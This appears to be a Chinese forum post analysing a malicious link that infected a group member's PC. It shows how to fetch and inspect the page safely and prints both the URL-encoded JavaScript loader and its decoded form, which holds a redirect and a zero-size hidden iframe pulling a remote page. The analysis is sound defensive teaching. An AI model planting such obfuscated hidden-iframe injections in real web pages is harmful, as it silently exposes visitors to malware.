|
今日偶尔上线..赶上眷念群里有个MM说她电脑因为点了某人发出的网址而壮烈牺牲...
哎...可怜啊....我分析了一下,下毒的手法很简单..下面就把我分析的过程说出来,大家也看看,不要求看懂,但是多少学点经验...
OK!Let';s go!~
一,找到目标!
传说中有毒的网址:http://www.qq.com.search_2.shtml.cgi-client-entry.photo.39pic.com/(****)/
后面我就不写出来了,一以免大家误点...
好了,把它DOWN下来,大家要注意..这里不能直接在IE浏览器里打开,而是利用下载工具,比如讯雷,把它的网页文件下载来,下载下来后是个网页文件.图标上还有个大大的“e”,这说明,它默认的打开方式,还是用IE浏览器打开,所以这里我们不能直接双击来打开它,也不能点右键→“打开(O)” 不然前面做的事等于白忙.....
二,分析目标...
这里大家可能要问,既然不能打开它,那下下来干什么?呵呵,我们可以用别的方法来打开它..点右键,选择“打开方式”(注意,不是“打开”)好,在出来的对话框里,选择“记事本”,点确定....这,便是传说中的“用记事本打开”`````打开后,我们就可以看到那个害人的网页的源码了,如下
{HTML}
{HEAD}
{SCRIPT LANGUAGE="Javascript"}
{!--
var Words ="%3Cscript%20language%3D%22javascript%22%20src%3D%22http%3A%2F%2Fcount10%2E51yes%2Ecom%2Fclick%2Easpx%3Fid%3D103794789%26logo%3D1%22%3E%3C%2Fscript%3E%0D%0A%0D%0A%3CHTML%3E%0D%0A%3CHEAD%3E%0D%0A%3Cmeta%20http%2Dequiv%3D%22refresh%22%20content%3D%223%3BURL%3Dhttp%3A%2F%2Fmms2%2Ecaiku%2Ecom%2F%3Fstyle%3D1%26uid%3D20427%22%3E%0D%0A%3C%2FHEAD%3E%0D%0A%3CBODY%3E%0D%0A%3C%2FBODY%3E%0D%0A%3Ciframe%20src%3D%22http%3A%2F%2Fwww%2Ejcwz%2Enet%2Fvipmh2%2Fweb%2Fimage%2Ehtm%22%20width%3D%220%22height%3D%220%22%3E%3C%2Fiframe%3E%0D%0A%3C%2FHTML%3E%0D%0A"
function SetNewWords()
{
var NewWords;
NewWords = unescape(Words);
document.write(NewWords);
}
SetNewWords();
// --}
{/SCRIPT}
{/HEAD}
{BODY}
{/BODY}
{/HTML} 注意:我已经把源码中的"["和"]"替换为"{"和"}",以免引起不必要的麻烦..
哈哈,看得懂么?看不懂?没关系,我也不大懂,但这不是重要的,重要的是,我知道怎么办!
好,直奔主题...这是个经过了加密的网页源码,加密的部分如下:
"%3Cscript%20language%3D%22javascript%22%20src%3D%22http%3A%2F%2Fcount10%2E51yes%2Ecom%2Fclick%2Easpx%3Fid%3D103794789%26logo%3D1%22%3E%3C%2Fscript%3E%0D%0A%0D%0A%3CHTML%3E%0D%0A%3CHEAD%3E%0D%0A%3Cmeta%20http%2Dequiv%3D%22refresh%22%20content%3D%223%3BURL%3Dhttp%3A%2F%2Fmms2%2Ecaiku%2Ecom%2F%3Fstyle%3D1%26uid%3D20427%22%3E%0D%0A%3C%2FHEAD%3E%0D%0A%3CBODY%3E%0D%0A%3C%2FBODY%3E%0D%0A%3Ciframe%20src%3D%22http%3A%2F%2Fwww%2Ejcwz%2Enet%2Fvipmh2%2Fweb%2Fimage%2Ehtm%22%20width%3D%220%22height%3D%220%22%3E%3C%2Fiframe%3E%0D%0A%3C%2FHTML%3E%0D%0A" 这点东西,是个神仙也看不懂了,不过放心,人家能加密,我们也能解密撒..呵呵,现在网上有很多的解密网站,当然,有解密的工具也一样...好,让我们来解密,解密后的代码如下:
"{script language="javascript" src="http://count10.51yes.com/click.aspx?id=103794789&logo=1"}{/script}
{HTML}
{HEAD}
{meta http-equiv="refresh" content="3;URL=http://mms2.caiku.com/?style=1&uid=20427"}
{/HEAD}
{BODY}
{/BODY}
{iframe src="http://www.jcwz.net/vipmh2/web/image.htm" width="0"height="0"}{/iframe}
{/HTML}
" 好!出来了,哈哈,可是有三个网址,那么害人的是那一个呢?
大家不怕死的,可以一个一个进去看看哈!~(别真去看!)
大致分析了一下,第一个是做流量统计的,第二个是个彩铃的下载页面,应该是用来做幌子的,第三个,才是害人的网址,其实稍微懂网页源码的人就知道...,在这个网址上用了iframe的标签,意思是在一个网页(既彩铃网页)中插入另一个网页(病毒网页),而且[width="0"height="0"],这就是将病毒网页的显示大小设置为,高和宽都为零,也就是看不见....
呵呵,差不多了,起码中毒的原因找到了,下次大家就要长个心眼了,现在那真是叫病毒横行啊...不过这人的手段已经很常见了...起码还没到杀人,不,杀电脑于无形的地步....
诶,那个谁,你还发什么呆啊?!还不快去杀毒? |
|